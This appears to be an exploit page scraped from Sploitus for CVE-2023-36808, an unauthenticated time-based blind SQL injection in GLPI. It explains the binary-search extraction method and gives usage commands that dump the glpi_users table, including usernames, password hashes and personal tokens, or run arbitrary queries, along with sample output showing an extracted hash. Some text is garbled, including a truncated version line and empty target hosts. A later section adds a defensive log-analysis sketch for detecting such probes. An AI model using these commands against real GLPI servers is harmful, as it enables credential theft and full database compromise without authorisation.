## https://sploitus.com/exploit?id=9BC08ADB-8F4F-5010-BDA8-9F36150A79A7
# CVE-2023-36808 - GLPI Unauthenticated SQL Injection
## Vulnerability
GLPI versions **` field is injected directly into a SQL query without sanitisation:
```sql
SELECT id FROM glpi_agents WHERE deviceid = ''
```
No authentication is required. The vulnerability allows full database read access via blind SQL injection.
## Exploit
This script uses **time-based blind injection with binary search** to extract data significantly faster than generic tools.
- One SLEEP per boolean check (reliable regardless of table size)
- Binary search: ~7 requests per character instead of 95
- Field-level parallelism: name, password, and token extracted simultaneously per user
- Concurrency cap prevents timing interference between parallel requests
### Requirements
```bash
pip install -r requirements.txt
```
### Usage
```bash
# Dump the full glpi_users table (name, password hash, personal_token)
python3 exploit.py http:///glpi
# Custom SQL query
python3 exploit.py http:///glpi --query "SELECT @@version"
# Tune timing (lower sleep = faster, increase if you get wrong results)
python3 exploit.py http:///glpi --sleep 0.3
# Increase parallel request cap (default 2, raise on high-latency remote targets)
python3 exploit.py http:///glpi --parallel 4
```
### Example output
```
[*] CVE-2023-36808 - GLPI Unauthenticated SQLi
[*] Target : http://10.0.0.1/glpi/front/inventory.php
[*] Sleep : 0.5s Threshold: 0.35s Parallel: 2
[+] Target reachable
[+] Injection confirmed
[*] User 1/7
name glpi
password $2y$10$xN.12pQxSLlQdMJzP26EWe...
personal_token xxxx
...
```
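For defenders, the behaviour described above (one SLEEP per boolean check, sent repeatedly to `front/inventory.php`) appears in access logs as a single client whose response times fall into two separated groups. The following detection sketch is an added example, not part of the original exploit repository; the log format, thresholds, function names and sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Assumed log_format (not from the page):
# $remote_addr - $remote_user [$time_local] "$request" $status $body_bytes_sent $request_time
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" '
    r'\d{3} \S+ (?P<rt>\d+\.\d+)$'
)
ENDPOINT = "/front/inventory.php"  # endpoint shown in the example output


def find_timing_probes(lines, min_requests=8, slow_s=0.3, gap_s=0.2,
                       min_slow_frac=0.2, max_slow_frac=0.8):
    """Flag clients whose requests to the inventory endpoint split into a fast
    and a slow latency cluster, the trace a time-based boolean oracle leaves."""
    by_ip = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or not m["path"].split("?", 1)[0].endswith(ENDPOINT):
            continue
        by_ip[m["ip"]].append(float(m["rt"]))

    flagged = {}
    for ip, times in by_ip.items():
        slow = [t for t in times if t >= slow_s]
        fast = [t for t in times if t < slow_s]
        if len(times) < min_requests or not slow or not fast:
            continue
        slow_frac = len(slow) / len(times)
        # Require two separated clusters, not one client behind a noisy backend.
        if (min(slow) - max(fast) >= gap_s
                and min_slow_frac <= slow_frac <= max_slow_frac):
            flagged[ip] = {"requests": len(times), "slow": len(slow),
                           "slow_fraction": round(slow_frac, 2)}
    return flagged


def make_line(ip, rt):
    """Build one constructed log line in the assumed format."""
    return (f'{ip} - - [01/Jan/2024:10:00:00 +0000] '
            f'"POST /glpi/front/inventory.php HTTP/1.1" 200 312 {rt:.3f}')


# Constructed sample: one probing client, one normal agent, one low-volume client.
SAMPLE_LOG = (
    [make_line("198.51.100.7", t) for t in (0.02, 0.53, 0.03, 0.52, 0.55, 0.02, 0.04, 0.51, 0.03, 0.54)]
    + [make_line("192.0.2.10", t) for t in (0.03, 0.05, 0.04, 0.03, 0.06, 0.04, 0.05, 0.03, 0.04)]
    + [make_line("203.0.113.5", t) for t in (0.04, 1.20, 0.05)]
)
```

Timing alone is a heuristic: tune `slow_s` and `gap_s` to the latency baseline of your own inventory endpoint and correlate flagged clients with known agent addresses.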
## References
- [NVD - CVE-2023-36808](https://nvd.nist.gov/vuln/detail/CVE-2023-36808)
- [GLPI Security Advisory](https://github.com/glpi-project/glpi/security/advisories/GHSA-f3vh-qmxj-43rm)